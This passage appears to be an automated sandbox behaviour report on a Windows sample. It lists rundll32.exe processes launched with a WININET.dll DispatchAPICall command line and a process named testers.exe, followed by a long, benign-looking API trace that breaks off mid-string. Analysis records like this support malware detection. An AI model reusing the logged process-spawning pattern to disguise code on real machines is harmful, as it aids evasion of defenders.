"c:\\windows\\system32\\rundll32.exe" page_root = "0x4d65c000" os_pid = "0x4d4" os_integrity_level = "0x1000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0x6dc" cmd_line = "\"C:\\Windows\\system32\\rundll32.exe\" \"C:\\Windows\\syswow64\\WININET.dll\",DispatchAPICall 1 " cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e39d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 185 os_tid = 0x7f4 Process: id = "29" image_name = "rundll32.exe" filename = "c:\\windows\\syswow64\\rundll32.exe" page_root = "0x666ab000" os_pid = "0x7ac" os_integrity_level = "0x1000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "28" os_parent_pid = "0x4d4" cmd_line = "\"C:\\Windows\\system32\\rundll32.exe\" \"C:\\Windows\\syswow64\\WININET.dll\",DispatchAPICall 1 " cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e39d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 186 os_tid = 0x61c Thread: id = 187 os_tid = 0x5a4 Thread: id = 188 os_tid = 0x504 Thread: id = 189 os_tid = 0x7cc Thread: id = 190 os_tid = 0x5d4 Thread: id = 191 os_tid = 0x274 Thread: id = 193 os_tid = 0x630 Process: id = "30" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xa19f000" os_pid = "0xf0" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "9" os_parent_pid = "0x1d4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000deaa" [0xc000000f], "LOCAL" [0x7] Thread: id = 195 os_tid = 0x234 Thread: id = 196 os_tid = 0x4d0 Thread: id = 197 os_tid = 0x4b0 Thread: id = 198 os_tid = 0x474 Thread: id = 199 os_tid = 0x410 Thread: id = 200 os_tid = 0x7e4 Thread: id = 201 os_tid = 0x7d0 Thread: id = 202 os_tid = 0x6a8 Thread: id = 203 os_tid = 0x178 Thread: id = 204 os_tid = 0x144 Thread: id = 205 os_tid = 0x11c Thread: id = 206 os_tid = 0x118 Thread: id = 244 os_tid = 0x4a8 Process: id = "31" image_name = "rundll32.exe" filename = "c:\\windows\\system32\\rundll32.exe" page_root = "0x247e2000" os_pid = "0x334" os_integrity_level = "0x1000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0x6dc" cmd_line = "\"C:\\Windows\\system32\\rundll32.exe\" \"C:\\Windows\\syswow64\\WININET.dll\",DispatchAPICall 1 " cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e39d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 209 os_tid = 0x250 Process: id = "32" image_name = "rundll32.exe" filename = "c:\\windows\\syswow64\\rundll32.exe" page_root = "0x79b71000" os_pid = "0x240" os_integrity_level = "0x1000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "31" os_parent_pid = "0x334" cmd_line = "\"C:\\Windows\\system32\\rundll32.exe\" \"C:\\Windows\\syswow64\\WININET.dll\",DispatchAPICall 1 " cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e39d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 210 os_tid = 0x7a0 Thread: id = 212 os_tid = 0x59c Thread: id = 213 os_tid = 0x604 Thread: id = 214 os_tid = 0x2e0 Thread: id = 215 os_tid = 0x320 Thread: id = 216 os_tid = 0x670 Process: id = "33" image_name = "testers.exe" filename = "c:\\progra~2\\common~1\\testers.exe" page_root = "0x64bf4000" os_pid = "0x530" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0x6dc" cmd_line = "C:\\PROGRA~2\\COMMON~1\\testers.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e39d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 211 os_tid = 0x130 [0245.139] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8dfa90 | out: lpSystemTimeAsFileTime=0x8dfa90*(dwLowDateTime=0x33d59460, dwHighDateTime=0x1d661be)) [0245.140] GetCurrentThreadId () returned 0x130 [0245.140] GetCurrentProcessId () returned 0x530 [0245.140] QueryPerformanceCounter (in: lpPerformanceCount=0x8dfa88 | out: lpPerformanceCount=0x8dfa88*=17566681773) returned 1 [0245.171] GetStartupInfoW (in: lpStartupInfo=0x8dfa20 | out: lpStartupInfo=0x8dfa20*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\PROGRA~2\\COMMON~1\\testers.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x7737fd35, hStdError=0x773e7daf)) [0245.172] GetProcessHeap () returned 0xbe0000 [0245.173] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75990000 [0245.174] GetProcAddress (hModule=0x75990000, lpProcName="FlsAlloc") returned 0x759a4f2b [0245.174] GetProcAddress (hModule=0x75990000, lpProcName="FlsFree") returned 0x759a359f [0245.174] GetProcAddress (hModule=0x75990000, lpProcName="FlsGetValue") returned 0x759a1252 [0245.174] GetProcAddress (hModule=0x75990000, lpProcName="FlsSetValue") returned 0x759a4208 [0245.174] GetProcAddress (hModule=0x75990000, lpProcName="InitializeCriticalSectionEx") returned 0x759a4d28 [0245.174] GetProcAddress (hModule=0x75990000, lpProcName="CreateEventExW") returned 0x75a2410b [0245.174] GetProcAddress (hModule=0x75990000, lpProcName="CreateSemaphoreExW") returned 0x75a24195 [0245.175] GetProcAddress (hModule=0x75990000, lpProcName="SetThreadStackGuarantee") returned 0x759ad31f [0245.175] GetProcAddress (hModule=0x75990000, lpProcName="CreateThreadpoolTimer") returned 0x759bee7e [0245.175] GetProcAddress (hModule=0x75990000, lpProcName="SetThreadpoolTimer") returned 0x773a441c [0245.175] GetProcAddress (hModule=0x75990000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x773cc50e [0245.175] GetProcAddress (hModule=0x75990000, lpProcName="CloseThreadpoolTimer") returned 0x773cc381 [0245.175] GetProcAddress (hModule=0x75990000, lpProcName="CreateThreadpoolWait") returned 0x759bf088 [0245.175] GetProcAddress (hModule=0x75990000, lpProcName="SetThreadpoolWait") returned 0x773b05d7 [0245.176] GetProcAddress (hModule=0x75990000, lpProcName="CloseThreadpoolWait") returned 0x773cca24 [0245.176] GetProcAddress (hModule=0x75990000, lpProcName="FlushProcessWriteBuffers") returned 0x77380b8c [0245.176] GetProcAddress (hModule=0x75990000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7743fde8 [0245.176] GetProcAddress (hModule=0x75990000, lpProcName="GetCurrentProcessorNumber") returned 0x773d1e1d [0245.176] GetProcAddress (hModule=0x75990000, lpProcName="GetLogicalProcessorInformation") returned 0x75a24761 [0245.176] GetProcAddress (hModule=0x75990000, lpProcName="CreateSymbolicLinkW") returned 0x75a1cd11 [0245.176] GetProcAddress (hModule=0x75990000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0245.176] GetProcAddress (hModule=0x75990000, lpProcName="EnumSystemLocalesEx") returned 0x75a2424f [0245.177] GetProcAddress (hModule=0x75990000, lpProcName="CompareStringEx") returned 0x75a246b1 [0245.177] GetProcAddress (hModule=0x75990000, lpProcName="GetDateFormatEx") returned 0x75a36676 [0245.177] GetProcAddress (hModule=0x75990000, lpProcName="GetLocaleInfoEx") returned 0x75a24751 [0245.177] GetProcAddress (hModule=0x75990000, lpProcName="GetTimeFormatEx") returned 0x75a365f1 [0245.177] GetProcAddress (hModule=0x75990000, lpProcName="GetUserDefaultLocaleName") returned 0x75a247c1 [0245.177] GetProcAddress (hModule=0x75990000, lpProcName="IsValidLocaleName") returned 0x75a247e1 [0245.177] GetProcAddress (hModule=0x75990000, lpProcName="LCMapStringEx") returned 0x75a247f1 [0245.177] GetProcAddress (hModule=0x75990000, lpProcName="GetCurrentPackageId") returned 0x0 [0245.178] GetProcAddress (hModule=0x75990000, lpProcName="GetTickCount64") returned 0x759beee0 [0245.178] GetProcAddress (hModule=0x75990000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0245.178] GetProcAddress (hModule=0x75990000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0245.178] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x3bc) returned 0xc01f08 [0245.179] GetCurrentThreadId () returned 0x130 [0245.179] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x18) returned 0xbf2a08 [0245.179] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x800) returned 0xc022d0 [0245.179] GetStartupInfoW (in: lpStartupInfo=0x8df9f0 | out: lpStartupInfo=0x8df9f0*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\PROGRA~2\\COMMON~1\\testers.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x2b9d0d, hStdOutput=0x250dbbbb, hStdError=0x0)) [0245.179] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0245.179] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0245.179] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0245.179] GetCommandLineW () returned="C:\\PROGRA~2\\COMMON~1\\testers.exe" [0245.179] GetEnvironmentStringsW () returned 0xc02ad8* [0245.179] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xaca) returned 0xc035b0 [0245.180] FreeEnvironmentStringsW (penv=0xc02ad8) returned 1 [0245.180] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x354ba8, nSize=0x104 | out: lpFilename="C:\\PROGRA~2\\COMMON~1\\testers.exe" (normalized: "c:\\progra~2\\common~1\\testers.exe")) returned 0x20 [0245.180] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4a) returned 0xbf2a28 [0245.180] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x98) returned 0xc02ad8 [0245.180] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x3e) returned 0xbf2120 [0245.180] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x6c) returned 0xc02b78 [0245.180] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x6e) returned 0xc02bf0 [0245.180] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x78) returned 0xbef860 [0245.180] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x62) returned 0xc02c68 [0245.203] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2e) returned 0xbfc588 [0245.203] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x48) returned 0xbf81a0 [0245.203] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x28) returned 0xbfbfe0 [0245.203] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x1a) returned 0xbffb20 [0245.203] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x4a) returned 0xc02cd8 [0245.203] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x72) returned 0xbef8e0 [0245.203] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x30) returned 0xbfc5c0 [0245.203] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2e) returned 0xbfc5f8 [0245.203] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x1c) returned 0xbffb48 [0245.203] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0xd2) returned 0xc02d30 [0245.203] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x7c) returned 0xc02e10 [0245.203] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x36) returned 0xc02e98 [0245.203] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x3a) returned 0xbf2168 [0245.203] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x90) returned 0xc02ed8 [0245.203] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x24) returned 0xbfc010 [0245.203] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x30) returned 0xbfc630 [0245.203] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x36) returned 0xc02f70 [0245.203] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x48) returned 0xbf81f0 [0245.203] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x52) returned 0xc02fb0 [0245.203] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x3c) returned 0xbf21b0 [0245.203] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x82) returned 0xc03010 [0245.203] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2e) returned 0xbfc668 [0245.203] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x1e) returned 0xbffb70 [0245.203] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2c) returned 0xbfc6a0 [0245.203] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x54) returned 0xc040a0 [0245.204] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x52) returned 0xc04100 [0245.204] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2a) returned 0xbfc6d8 [0245.204] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x3c) returned 0xbf21f8 [0245.204] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x54) returned 0xc04160 [0245.204] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x24) returned 0xbfc040 [0245.204] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x30) returned 0xbfc710 [0245.204] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x8c) returned 0xc030a0 [0245.204] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc035b0 | out: hHeap=0xbe0000) returned 1 [0245.205] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x80) returned 0xc03138 [0245.205] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x800) returned 0xc031c0 [0245.205] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0245.205] GetLastError () returned 0x0 [0245.205] SetLastError (dwErrCode=0x0) [0245.205] GetLastError () returned 0x0 [0245.205] SetLastError (dwErrCode=0x0) [0245.205] GetLastError () returned 0x0 [0245.205] SetLastError (dwErrCode=0x0) [0245.205] GetACP () returned 0x4e4 [0245.205] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x220) returned 0xc039c8 [0245.205] GetLastError () returned 0x0 [0245.205] SetLastError (dwErrCode=0x0) [0245.205] IsValidCodePage (CodePage=0x4e4) returned 1 [0245.206] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x8df9e4 | out: lpCPInfo=0x8df9e4) returned 1 [0245.206] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x8df4ac | out: lpCPInfo=0x8df4ac) returned 1 [0245.206] GetLastError () returned 0x0 [0245.206] SetLastError (dwErrCode=0x0) [0245.206] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x8df8c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0245.206] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x8df8c0, cbMultiByte=256, lpWideCharStr=0x8df228, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0245.206] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpCharType=0x8df4c0 | out: lpCharType=0x8df4c0) returned 1 [0245.206] GetLastError () returned 0x0 [0245.206] SetLastError (dwErrCode=0x0) [0245.206] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x8df8c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0245.206] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x8df8c0, cbMultiByte=256, lpWideCharStr=0x8df1f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0245.206] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0245.206] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x8defe8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0245.206] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x8df7c0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ+¸\r%üù\x8d", lpUsedDefaultChar=0x0) returned 256 [0245.206] GetLastError () returned 0x0 [0245.206] SetLastError (dwErrCode=0x0) [0245.206] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x8df8c0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0245.206] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x8df8c0, cbMultiByte=256, lpWideCharStr=0x8df218, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ+Ā") returned 256 [0245.206] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" 